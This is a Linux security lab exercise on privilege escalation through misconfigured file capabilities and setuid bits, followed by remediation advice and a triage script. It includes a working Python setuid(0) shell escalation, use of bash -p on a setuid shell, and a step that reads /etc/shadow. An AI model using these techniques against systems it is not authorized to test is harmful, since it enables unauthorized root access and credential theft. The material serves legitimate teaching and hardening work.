Exercise 14: Abusing the setcap and setuid Capabilities

Mar 12, 2025

Objective: Understand how Linux file capabilities (for example cap_setuid, assigned to a binary with setcap) and the setuid permission bit let a binary act with elevated privilege without being run as root, how an attacker abuses misconfigured ones to escalate to root, and how to audit and lock them down so they cannot be abused.


Scenario: Linux capabilities allow specific privileges to be granted to binaries, enabling them to perform certain actions without requiring full root access. However, misconfigured or unnecessary capabilities can be exploited to escalate privileges. Your task is to identify binaries with elevated capabilities, exploit them, and secure the system by limiting these capabilities.


Lab Setup

  1. Environment:
    • A Linux system whose filesystem supports extended attributes (file capabilities are stored in the security.capability xattr) and at least one deliberately misconfigured binary, for example /usr/bin/python3 with cap_setuid.
  2. Tools Required:
    • getcap and setcap (libcap tools, package libcap2-bin on Debian/Ubuntu)
    • find (to locate setuid binaries)
    • Basic scripting knowledge (optional).

Lab Steps

Step 1: Identify Capabilities on Binaries

List all binaries with capabilities using getcap:

getcap -r / 2>/dev/null

Example output:

/usr/bin/python3 = cap_setuid+ep
/usr/bin/ping = cap_net_raw+ep

cap_setuid+ep: The binary may call setuid()/setresuid() to become any user, including root (UID 0). This is root-equivalent, and on an interpreter such as python3 anyone who can run it controls what code makes that call.

cap_net_raw+ep: The binary may open raw and packet sockets (sniff and craft packets). It does not by itself give root, which is why ping legitimately carries it.

The suffix +ep means the capability is in the file's effective (e) and permitted (p) sets, so the process gets it active immediately on exec. Newer libcap versions print the same thing as cap_net_raw=ep.

For each hit, ask two questions: is the capability root-equivalent (cap_setuid, cap_setgid, cap_sys_admin, cap_sys_ptrace, cap_dac_read_search, cap_dac_override, cap_sys_module and similar), and does the binary let its caller decide what code runs with it (interpreters, debuggers, editors, anything with a shell escape)? A yes to both is a straightforward privilege escalation.

Step 2: Exploit Misconfigured Capabilities

Exploiting cap_setuid:

If a binary like /usr/bin/python3 has the cap_setuid capability, create a Python script to escalate privileges:

import os

# Succeeds only because the interpreter holds cap_setuid in its effective set;
# an unprivileged process without it would get EPERM here.
os.setuid(0)
# Spawn a shell that inherits the new UID 0.
os.system("/bin/bash")

Save the script as exploit.py and execute it:

python3 exploit.py

Verify root access; whoami should print root and id should show uid=0(root), because setuid(0) with cap_setuid sets the real, effective and saved UIDs:

whoami
id

Exploiting cap_net_bind_service:

cap_net_bind_service does not lead to root. It lets the binary bind TCP/UDP ports below 1024, so an unprivileged user who controls such a binary can squat on a privileged port (for example 80 or 443) and impersonate or shadow a legitimate service. Start the binary on a privileged port, substituting whatever option it uses to choose its port:

/path/to/binary -p 80

Exploiting setuid Permissions:

Locate regular files with the setuid bit set:

find / -perm -4000 -type f 2>/dev/null

Example output:

/bin/bash

A setuid-root shell is an immediate escalation. Bash normally drops its effective UID back to the real UID at startup when they differ; the -p (privileged) option disables that, so the shell keeps EUID 0:

/bin/bash -p
whoami
id

whoami reports the effective UID and prints root; id shows your original uid together with euid=0(root). Note that this works only when the setuid bit is on the binary itself (chmod u+s); the kernel ignores setuid on interpreted scripts.

Step 3: Gain Unauthorized Access

  1. Exploit the identified binaries to perform unauthorized actions, such as:
    • Reading sensitive files (e.g., /etc/shadow).
    • Modifying system settings.

Solution

Explanation:

  • Linux capabilities and setuid permissions enable binaries to perform privileged actions. Misconfigured capabilities or unnecessary setuid bits can allow attackers to escalate privileges or bypass security restrictions.

Prevention:

Audit Capabilities:

Regularly list and review file capabilities:

getcap -r / 2>/dev/null

Remove unnecessary capabilities:

sudo setcap -r /path/to/binary

Restrict setuid Binaries:

Identify and limit setuid binaries:

find / -perm -4000 2>/dev/null

Remove the setuid bit if not required:

chmod u-s /path/to/binary

Use Principle of Least Privilege:

Assign only the capabilities necessary for the binary's function, for example cap_net_raw for ping rather than a setuid-root ping.

Never grant root-equivalent capabilities such as cap_setuid, cap_setgid or cap_sys_admin to interpreters, shells or other binaries whose behaviour the caller controls; they are no safer than the setuid bit.

Monitor and Log Usage:

Use tools like auditd to track the usage of capabilities and setuid binaries, for example by watching execution (-p x) of every binary that carries a file capability and logging setuid-family syscalls issued by unprivileged users.
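The following script ties Step 1 and the audit advice above together. It is an added example, not part of the original exercise: it parses getcap -r and find -perm -4000 output, flags root-equivalent capabilities and risky setuid binaries, and prints the setcap -r / chmod u-s command that would remediate each finding. The capability list, the two setuid allow/deny lists and the sample getcap lines are my own assumptions, constructed for illustration rather than captured from a real host; extend the lists to match your baseline.

```shell
#!/bin/sh
# Added triage helper for this exercise (not part of the original page).
# Parses getcap -r and find -perm -4000 output, flags root-equivalent
# capabilities and risky setuid binaries, and prints the remediation.
# The capability and binary lists below are assumptions; extend them for
# your own baseline. Paths containing spaces are not handled.

# File capabilities that hand a local user root-equivalent power.
DANGEROUS_CAPS="cap_setuid cap_setgid cap_sys_admin cap_sys_ptrace cap_sys_module cap_dac_override cap_dac_read_search cap_chown cap_fowner cap_setfcap cap_sys_rawio"

# Setuid-root shells, interpreters and editors are always a finding;
# the second list is what a stock distribution typically ships setuid.
HIGH_RISK_SETUID="bash sh dash zsh ksh python perl ruby find vim vi nano less more awk env nmap"
EXPECTED_SETUID="passwd su sudo mount umount newgrp chsh chfn gpasswd fusermount pkexec"

# classify_cap_line "<getcap output line>" -> "HIGH|LOW <path> <capset>"
# Accepts both "path = caps+ep" (libcap < 2.41) and "path caps=ep" (newer).
classify_cap_line() {
    local line="$1" path rest group names cap verdict=LOW
    path="${line%% *}"            # first field is the file
    rest="${line#* }"             # everything after it
    rest="${rest#= }"             # drop the old-format " = " separator
    for group in $rest; do        # e.g. "cap_setuid,cap_net_raw+ep"
        names="${group%%[+=-]*}"  # strip the flag suffix (+ep, =ep, ...)
        for cap in $(printf '%s' "$names" | tr ',' ' '); do
            case " $DANGEROUS_CAPS " in *" $cap "*) verdict=HIGH ;; esac
        done
    done
    printf '%s %s %s\n' "$verdict" "$path" "$rest"
}

# classify_setuid_line "<path>" -> "HIGH|EXPECTED|REVIEW <path>"
classify_setuid_line() {
    local path="$1" name verdict=REVIEW
    name="${path##*/}"
    name=$(printf '%s' "$name" | sed 's/[0-9.]*$//')   # python3.11 -> python
    case " $HIGH_RISK_SETUID " in *" $name "*) verdict=HIGH ;; esac
    case " $EXPECTED_SETUID " in *" $name "*) verdict=EXPECTED ;; esac
    printf '%s %s\n' "$verdict" "$path"
}

# triage "<getcap output>" "<newline-separated setuid paths>"
triage() {
    printf '%s\n' "$1" | while IFS= read -r line; do
        [ -n "$line" ] || continue
        result=$(classify_cap_line "$line")
        printf '[caps]   %s\n' "$result"
        case $result in HIGH*) printf '         fix: sudo setcap -r %s\n' "${line%% *}" ;; esac
    done
    printf '%s\n' "$2" | while IFS= read -r path; do
        [ -n "$path" ] || continue
        result=$(classify_setuid_line "$path")
        printf '[setuid] %s\n' "$result"
        case $result in HIGH*|REVIEW*) printf '         fix: sudo chmod u-s %s\n' "$path" ;; esac
    done
}

# Run against the live host (needs getcap and find on PATH).
triage_live() {
    triage "$(getcap -r / 2>/dev/null)" "$(find / -perm -4000 -type f 2>/dev/null)"
}

# Constructed sample output (not captured from a real system) so the script
# runs offline: two genuine findings and two benign entries in each list.
SAMPLE_GETCAP='/usr/bin/python3 = cap_setuid+ep
/usr/bin/ping = cap_net_raw+ep
/usr/sbin/tcpdump cap_net_admin,cap_net_raw=ep
/opt/tools/dumper = cap_dac_read_search+ep'
SAMPLE_SETUID='/bin/bash
/usr/bin/passwd
/usr/bin/su
/opt/tools/helper'

if [ "${1:-}" = "--live" ]; then triage_live; else triage "$SAMPLE_GETCAP" "$SAMPLE_SETUID"; fi
```

Run it with no arguments to see the report on the constructed sample (python3 and the cap_dac_read_search binary come out HIGH, ping and tcpdump LOW; bash is HIGH, the unknown helper is flagged for review). Run it as ./triage.sh --live on the lab machine before and after remediation; the second run should print no HIGH lines.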


Testing and Verification

  1. Re-run getcap and find commands to verify that unnecessary capabilities and setuid bits are removed.
  2. Attempt to exploit the previously vulnerable binaries to confirm that mitigations are effective.
  3. Document all changes and ensure compliance with security policies.

Reflection

This exercise demonstrates the risks of misconfigured capabilities and setuid permissions, and how they can be exploited for privilege escalation. By identifying, exploiting, and securing these features, you’ve gained valuable insights into securing Linux systems against such vulnerabilities.
